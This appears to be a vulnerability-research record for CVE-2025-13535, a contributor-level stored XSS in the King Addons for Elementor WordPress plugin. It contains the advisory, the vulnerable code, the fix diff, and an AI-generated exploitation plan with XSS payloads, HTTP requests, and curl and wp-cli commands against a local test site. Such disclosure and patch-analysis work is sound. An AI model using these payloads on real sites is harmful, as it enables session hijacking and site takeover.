[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAeaO3BP3eiOWBVXtb_ZEWb6vhfjMwgSRovZ_cR_2Up8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2025-13535","king-addons-for-elementor-authenticated-contributor-dom-based-stored-cross-site-scripting-via-multiple-widgets","King Addons for Elementor \u003C= 51.1.38 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Multiple Widgets","The King Addons for Elementor plugin for WordPress is vulnerable to multiple Contributor+ DOM-Based Stored Cross-Site Scripting vulnerabilities in all versions up to, and including, 51.1.38. This is due to insufficient input sanitization and output escaping across multiple widgets and features. The plugin uses esc_attr() and esc_url() within JavaScript inline event handlers (onclick attributes), which allows HTML entities to be decoded by the DOM, enabling attackers to break out of the JavaScript context. Additionally, several JavaScript files use unsafe DOM manipulation methods (template literals, .html(), and window.location.href with unvalidated URLs) with user-controlled data. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via Elementor widget settings that execute when a user accesses the injected page or when an administrator previews the page in Elementor's editor. The vulnerability was partially patched in version 5.1.51.","king-addons",null,"\u003C=51.1.53","51.1.54","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-31 00:00:00","2026-04-01 14:37:35",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F95d3e76c-612d-436c-9d32-6228d7dcbf35?source=api-prod",2,[22,23,24,25,26,27,28],"includes\u002FAdmin.php","includes\u002FLibrariesMap.php","includes\u002Fadmin\u002Fjs\u002Fai-page-translator.js","includes\u002Fadmin\u002Fshared\u002Fdark-theme.php","includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php","includes\u002Fextensions\u002FHeader_Footer_Builder\u002FELHF_Settings_Page.php","includes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php","researched",false,3,"This plan targets **CVE-2025-13535**, a Stored DOM-Based Cross-Site Scripting (XSS) vulnerability in the **King Addons for Elementor** plugin. The vulnerability arises from two primary flaws:\n1.  **Improper Output Escaping in Event Handlers:** Using `esc_attr()` or `esc_url()` inside JavaScript `onclick` attributes, allowing attribute breakout via HTML entity decoding.\n2.  **Unsafe DOM Manipulation:** Client-side JavaScript (specifically for widgets and the AI translator) using `.html()` or template literals with unvalidated data from REST\u002FAJAX endpoints.\n\n---\n\n### 1. 
Vulnerability Summary\n*   **Vulnerability Name:** Authenticated (Contributor+) DOM-Based Stored XSS\n*   **Plugin Slug:** `king-addons`\n*   **Vulnerable Components:** Multiple Elementor Widgets (Button, Post Grid, etc.) and the `Ajax_Select2_API` REST controller.\n*   **Affected Versions:** \u003C= 51.1.38\n*   **Why it exists:** The plugin's REST API specifically decodes HTML entities in post titles (`html_entity_decode`) before sending them to the client. The client-side JavaScript then renders these titles using jQuery's `.html()` method. Additionally, widget templates render user-controlled URLs\u002Fsettings inside `onclick` attributes using `esc_attr()`, which the browser decodes before JavaScript execution.\n\n### 2. Attack Vector Analysis\n*   **Authentication Level:** Contributor or higher (any role with `edit_posts` capability).\n*   **Entry Points:**\n    1.  **Post Title Injection:** Creating a post with a malicious title.\n    2.  **Widget Link Injection:** Setting a widget's URL or custom attribute in the Elementor Editor.\n*   **Vulnerable Endpoints:**\n    *   **REST API:** `\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType`\n    *   **AJAX:** `king_addons_el_hf_get_posts_by_query` (Action: `wp_ajax_king_addons_el_hf_get_posts_by_query`)\n*   **Payload Type:** `\">\u003Cimg src=x onerror=alert(origin)>` or `javascript:alert(1)`\n\n### 3. Code Flow\n\n#### Path A: DOM XSS via Post Selection (REST API)\n1.  **Attacker (Contributor):** Creates a post with title `\u003Cimg src=x onerror=alert(1)>`.\n2.  **King Addons REST Controller:** `Ajax_Select2_API::getPostsByPostType` (in `includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php`) fetches the title.\n3.  **Vulnerable Sink (PHP):** It calls `'text' => html_entity_decode(get_the_title())`. This explicitly decodes any existing safety entities.\n4.  **Client-Side JS:** A widget (e.g., Post Grid) or the Elementor Editor's post selector calls this REST route.\n5. 
 **Vulnerable Sink (JS):** The Select2 handler or widget JS renders the `text` property using `.html()` or template literals, executing the script.\n\n#### Path B: Inline Event Handler Breakout (Widget Template)\n1.  **Attacker (Contributor):** Adds a widget (e.g., Button) and sets a URL\u002FAttribute to `');alert(1);('`.\n2.  **Vulnerable Sink (PHP):** The widget template renders an inline handler: `onclick=\"someFunction('\u003C?php echo esc_attr($url); ?>')\"` (inferred from description).\n3.  **Browser Decoding:** The browser decodes the attribute value `&#039;);alert(1);(&#039;` back to `');alert(1);('` before JS execution.\n4.  **Execution:** The JS engine executes `someFunction('');alert(1);('')`.\n\n### 4. Nonce Acquisition Strategy\n\nThe `Ajax_Select2_API` REST route uses `permission_callback => '__return_true'` and relies on `current_user_can('edit_posts')`. Standard REST API authentication (nonce in `X-WP-Nonce` header) is required if accessed via the browser.\n\nThe Header\u002FFooter Builder AJAX endpoint requires a specific nonce:\n1.  **Shortcode\u002FLocation:** The script `king-addons-el-hf-admin` is enqueued on the Header\u002FFooter builder page: `wp-admin\u002Fedit.php?post_type=king-addons-el-hf`.\n2.  **Extraction:**\n    *   Navigate to: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=king-addons-el-hf`\n    *   Execute JS: `window.king_addons_el_hf_admin?.nonce`\n\n### 5. 
Exploitation Strategy\n\n#### Step 1: Inject Malicious Post Title\n*   **Objective:** Create a post that will be served by the Select2 REST API.\n*   **HTTP Request:** Use `http_request` as a Contributor.\n*   **Endpoint:** `\u002Fwp-admin\u002Fpost-new.php` (or use WP-CLI to be faster).\n*   **Payload Title:** `XSS-Trigger \u003Cimg src=x onerror=alert(window.origin)>`\n\n#### Step 2: Trigger REST API Reflection\n*   **Objective:** Verify the REST API returns the decoded payload.\n*   **HTTP Request:**\n    ```http\n    GET \u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType?query_slug=post&s=XSS-Trigger HTTP\u002F1.1\n    Host: localhost:8080\n    X-WP-Nonce: [REST_NONCE]\n    ```\n*   **Expected JSON Response:** Look for `\"text\": \"XSS-Trigger \u003Cimg src=x onerror=alert(window.origin)>\"` (Note the lack of entity encoding).\n\n#### Step 3: Demonstrate DOM Sink (Manual Simulation)\n*   The agent should document that any King Addons widget using this REST endpoint for dynamic content (like \"Post Grid\" or \"Select Post\") will render this `text` via `.html()`.\n\n### 6. Test Data Setup\n1.  **User:** Create a user `contributor_user` with the `contributor` role.\n2.  **Post Type:** Enable the plugin's \"Header & Footer Builder\" extension in King Addons settings if needed.\n3.  **Content:**\n    ```bash\n    wp post create --post_type=post --post_title='XSS-Trigger \u003Cimg src=x onerror=alert(window.origin)>' --post_status=publish --post_author=[ID]\n    ```\n\n### 7. Expected Results\n*   The REST API call `\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType` must return the post title with the HTML tag **decoded**.\n*   In a browser context (e.g., using `browser_navigate` to an Elementor page with a King Addons Post Selector), an alert box should trigger when the post list is loaded.\n\n### 8. Verification Steps\n1.  
**Check REST output:**\n    ```bash\n    # As contributor\n    curl -u contributor:password \"http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType?query_slug=post&s=XSS-Trigger\"\n    ```\n2.  **Confirm Lack of Encoding:** Verify that `\u003C` and `>` in the title are NOT converted to `&lt;` and `&gt;` in the JSON response.\n\n### 9. Alternative Approaches\nIf the REST API is not sufficient, target the **Header Footer Builder** AJAX endpoint:\n*   **Action:** `king_addons_el_hf_get_posts_by_query`\n*   **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=king_addons_el_hf_get_posts_by_query&q=XSS-Trigger&nonce=[NONCE]\n    ```\n*   The code in `Header_Footer_Builder.php` lines 188-191 also retrieves `get_the_title()` and puts it into the `text` key of the response. If the associated JS for this feature (likely in the builder interface) uses `.html()`, the XSS will trigger there.","King Addons for Elementor is vulnerable to DOM-based Stored XSS because its REST and AJAX endpoints return post titles with decoded HTML entities, which are then rendered unsafely by client-side JavaScript. 
Additionally, the plugin uses esc_attr() within inline JavaScript event handlers in widget templates, allowing attackers to break out of the JavaScript context via HTML entity decoding by the browser.","\u002F\u002F includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n\u002F\u002F Lines 63-66 in getElementorTemplates\n$options[] = [\n    'id' => get_the_ID(),\n    'text' => html_entity_decode(get_the_title()),\n];\n\n---\n\n\u002F\u002F includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n\u002F\u002F Lines 104-107 in getPostsByPostType\n$options[] = [\n    'id' => get_the_ID(),\n    'text' => html_entity_decode(get_the_title()),\n];\n\n---\n\n\u002F\u002F includes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php\n\u002F\u002F Lines 188-195 in king_addons_el_hf_get_posts_by_query\n$title = get_the_title();\n$title .= (0 != $query->post->post_parent) ? ' (' . get_the_title($query->post->post_parent) . ')' : '';\n$id = get_the_id();\n$data[] = array(\n    'id' => 'post-' . 
$id,\n    'text' => $title,\n);","--- a\u002Fincludes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n+++ b\u002Fincludes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n@@ -65,7 +65,7 @@\n                 $the_query->the_post();\n                 $options[] = [\n                     'id' => get_the_ID(),\n-                    'text' => html_entity_decode(get_the_title()),\n+                    'text' => get_the_title(),\n                 ];\n             }\n         }\n@@ -106,7 +106,7 @@\n                 $query->the_post();\n                 $options[] = [\n                     'id' => get_the_ID(),\n-                    'text' => html_entity_decode(get_the_title()),\n+                    'text' => get_the_title(),\n                 ];\n             }\n         }\n--- a\u002Fincludes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php\n+++ b\u002Fincludes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php\n@@ -185,7 +185,7 @@\n             if ($query->have_posts()) {\n                 while ($query->have_posts()) {\n                     $query->the_post();\n-                    $title = get_the_title();\n+                    $title = wp_strip_all_tags(get_the_title());\n                     $title .= (0 != $query->post->post_parent) ? ' (' . get_the_title($query->post->post_parent) . ')' : '';\n                     $id = get_the_id();\n                     $data[] = array(","The exploit requires an attacker with at least Contributor-level permissions. \n\n1. The attacker creates a new post and sets the title to a malicious XSS payload, such as `\u003Cimg src=x onerror=alert(document.domain)>`.\n2. The attacker opens the Elementor editor and adds a King Addons widget that utilizes the Select2 post selector (e.g., Post Grid or any widget using dynamic post selection).\n3. 
When the widget configuration panel or the widget itself fetches post data via the REST API endpoint `\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType`, the server returns the post title with HTML entities decoded (due to the use of `html_entity_decode`).\n4. The client-side JavaScript renders this JSON response into the DOM using an unsafe sink like `.html()`, executing the script.\n5. Alternatively, for the inline event handler breakout, an attacker sets a widget URL setting to `');alert(1);('`. When the widget is rendered, the `esc_attr()` encoding is reversed by the browser's DOM parser before the JavaScript engine executes the `onclick` attribute, resulting in code execution.","gemini-3-flash-preview","2026-04-17 22:04:26","2026-04-17 22:05:08",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","51.1.53","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags\u002F51.1.53","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fking-addons.51.1.53.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags\u002F51.1.54","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fking-addons.51.1.54.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags"]